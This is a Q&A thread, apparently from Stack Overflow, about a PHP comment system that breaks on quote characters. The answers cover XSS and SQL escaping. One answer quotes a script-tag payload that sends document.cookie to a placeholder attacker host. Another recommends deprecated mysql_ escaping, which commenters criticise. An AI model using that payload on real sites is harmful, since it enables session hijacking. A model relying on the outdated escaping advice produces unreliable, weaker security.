how to stop people from breaking your comment system by writing quotes

Question

im making a comment system in my website. However, the commentor can break the system by typing special characters such as quotes, double quotes, semi-colons,colons etc. This is not a duplicate, i want to make sure that htmlentities are converted before it get to the database, i could use str_replace but it actually prints the literal code. for example: "

like this example:

$str ="Hi there bro what's up, im a "MEGA"";
$comment = $str;
echo $comment;

however it spits out errors, because they break the query because of the quotation marks.

Escape quotes before inserting into a database; or better yet, use prepared statements and bind variables, which do it for you — Mark Baker, Aug 20 '15 at 11:41
Users doesn't know how to do that. What statements could fix them? — Bido262, Aug 20 '15 at 11:42
How? Can u provide an answer, ill upvote if it helps. And mark it as answered if it worked. — Bido262, Aug 20 '15 at 11:43
all the answers on that post are exactly what you should be doing. — DevDonkey, Aug 20 '15 at 11:52
read it, but it was not the answer ive been looking for, so stop saying its a duplicate. — Bido262, Aug 20 '15 at 11:53
Please edit your question to include the code which is breaking and producing errors. — Kenster, Aug 20 '15 at 11:55

score 3 · Answer 1 · answered Aug 20 '15 at 11:52

What you have on your site is called Cross-site scripting vulnerability. Any user can inject code like:

Nice site what you have!<script>document.location="http://some_attacker/cookie.cgi?" + document.cookie</script>

What you will see is just Nice site what you have! as a comment, but the attacker can now take over your session.

You have to use htmlspecialchars() function when outputting user supplied data. You better read more about it.

Peter · Answer 2 · 2015-08-20T11:47:34.250

-1

If you're using MySQL and php mysql you have to pass data through the mysql_real_escape_string() function.

For example, before inserting into database:

$comment = mysql_real_escape_string($_POST['comment']);

Then, for printing your HTML:

<p><?=htmlspecialchars($Rs['comment'])?></p>

mysql_real_escape_string()

htmlspecialchars()

edited Aug 20 '15 at 11:47

answered Aug 20 '15 at 11:44

Peter

447
2
10

1

`mysql_` functions are deprecated.. you should never suggest using it! – Mihai Matei Aug 20 '15 at 11:45
mysqli is hard to understand, so thanks btw. – Bido262 Aug 20 '15 at 11:47
If you're using mysqli, then see the equivalent in mysqli [mysqli::real_escape_string](http://php.net/manual/es/mysqli.real-escape-string.php) – Peter Aug 20 '15 at 11:49
are you serious? :)) how can it be hard to understand if it is providing the same methods as `mysql_`.. you can use the OOP version only if you want so.. – Mihai Matei Aug 20 '15 at 11:50
I'm assuming he doesn't know prepared statements – Peter Aug 20 '15 at 11:51
They are totally different for me to understand. I tried to learn it, never got into my nerves. – Bido262 Aug 20 '15 at 11:52
1

@Bido262 Well you had better try again. PHP7 does not include the `mysql_` extensions any more – RiggsFolly Aug 20 '15 at 12:02

how to stop people from breaking your comment system by writing quotes

2 Answers2